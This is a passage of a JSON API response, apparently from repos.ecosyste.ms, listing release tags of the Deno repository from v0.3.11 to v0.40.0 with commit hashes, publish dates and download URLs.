/repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.e